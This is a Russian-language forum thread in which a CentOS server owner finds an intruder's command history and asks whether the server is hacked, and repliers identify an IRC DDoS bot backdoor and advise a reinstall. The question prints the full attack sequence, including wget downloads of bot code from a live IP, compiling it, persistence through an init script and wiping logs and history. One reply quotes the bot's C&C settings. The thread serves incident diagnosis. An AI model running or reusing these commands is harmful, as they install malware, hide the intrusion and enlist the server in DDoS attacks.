Назад | Перейти на главную страницу

Взломан ли мой веб-сервер?

Сегодня мы удаленно вошли на наш сервер CentOS с помощью Putty и, просматривая предыдущие команды с помощью стрелки вверх, наткнулись на следующее:

unset HISTFILE
mkdir /usr/lib/tmp 
cd /usr/lib/tmp 
wget http://188.72.217.17/mzb.c -o /dev/null
wget http://188.72.217.17/windef.h -o /dev/null
gcc mzb.c -o /bin/bot -lpthread
rm -rf mzb.c
rm -rf windef.h
wget http://188.72.217.17/botsupport.sh -o /dev/null
chmod +x botsupport.sh
mv botsupport.sh /etc/init.d/httpd2
cat /etc/init.d/network > /etc/init.d/network.bp
echo \#\!/bin/sh  >  /etc/init.d/network
echo nohup /etc/init.d/httpd2 \& >> /etc/init.d/network
cat /etc/init.d/network.bp >> /etc/init.d/network
cat /dev/null > /var/log/lastlog
history -c
nohup /etc/init.d/httpd2 &

(&& для ясности заменены новыми строками)

Я НИКОГДА не запускал эти команды! Как это случилось, мой сервер взламывают? Я немедленно изменил свой пароль root, но надеялся, что кто-то сможет понять, что здесь происходит.

Я вижу в источнике ссылки на ddos-ботов, и я и мой коллега серьезно обеспокоены!

Заранее спасибо!

centos

да, вас взломали. Хакер установил бэкдор IRC, и вы подключаетесь к этому серверу IRC:

const  int port      = 1254; 
const char channel[] = "#test";
const char password[]= "pass";
const char server[]  = "heathen.cc";

Бот-пастух может выполнять любые команды на вашем сервере. Рекомендую выключить сервер и переустановить немедленно. У бота есть несколько функций DDoS-атак, DNS-флуд, син-флуд и ICMP-флуд. Он также работает с окнами, что довольно круто. Существует действительно старый модуль распространения для заражения myDoom. Похоже на старую вредоносную программу.

В любом случае ответ - да, ваш сервер взломан или был взломан.

Вам следует немедленно отключить интернет-соединение с сервером, сделать полную резервную копию (помните, что другие файлы тоже могут быть скомпрометированы) и переустановить.

Кроме того, вы можете уведомить владельцев IP-адреса, с которого запущена бот-сеть (или что-то еще). Здесь RIPE данные whois.

Никогда не разрешайте вход root через SSH.

Ответ на ваш вопрос: ДА

Похоже, вы заразились BOT_VERSION где BOT_VERSION является

#define BOT_VERSION "Linux/Unix IRC DDoS bot ver "BIN_VERSVION" by ["CRED"MZђ"CEND"]. Supported features : "FEATURES

Разве ваш антивирус Linux не подхватил это?

Я бы, вероятно, продезинфицировал IP-адрес машины C&C перед публикацией.